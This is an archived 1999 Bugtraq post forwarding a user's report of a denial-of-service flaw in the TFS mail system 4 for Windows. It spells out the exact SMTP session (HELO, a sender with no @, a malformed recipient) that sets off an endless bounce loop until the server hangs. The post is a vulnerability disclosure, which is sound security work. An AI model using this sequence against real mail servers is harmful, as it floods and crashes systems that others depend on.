[11648] in bugtraq
I found this today and iam reporting it to you first!!! (fwd)
daemon@ATHENA.MIT.EDU (Alfred Huger)
Thu Sep 2 03:49:56 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.05.9908301213580.2270-100000@www.securityfocus.com>
Date: Mon, 30 Aug 1999 12:14:09 -0700
Reply-To: Alfred Huger <ah@SECURITYFOCUS.COM>
From: Alfred Huger <ah@SECURITYFOCUS.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
---------- Forwarded message ----------
Date: Mon, 30 Aug 1999 21:08:14 +0200
From: Hakan Franzen <fableman@hem.passagen.se>
To: vuldb@securityfocus.com
Subject: I found this today and iam reporting it to you first!!!
Target: TFS mail system 4 (i think its working on earlier version aswell) (TFS just got some award about there security about emails)
Company makes the product: www.tenfour.se
OS: win95 98 nt
Reported by: FableMan Noxidus a member of #HACK on IRCNet
a DoS routine: Makes a FAST loop generating loooots of emails until its forced to stop by admin.
what i did is: TELNET TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25
typing HELO
typing MAIL FROM:FABLEMAN NOXIDUS
RCPT TO:FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
DATA
Fix you system
Error found by FableMan Noxidus a #HACK member of IRCNet
.
QUIT
Thats all now the system tries to send to FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
but that address is wrong soo then it generates a reporterror and mails to FABLEMAN NOXIDUS but cos i havent included a @ then i will not go out on internet
then the loops starts.. its generating a reporterror and the loop is a truh..
I found it when i was playing around with a TFS mail gate system..
The speed of error report generation is about 1 or more email /sec soo if you start the loop and after 1 hr its a loot of email generated...
until windows or NT hangs cos of it
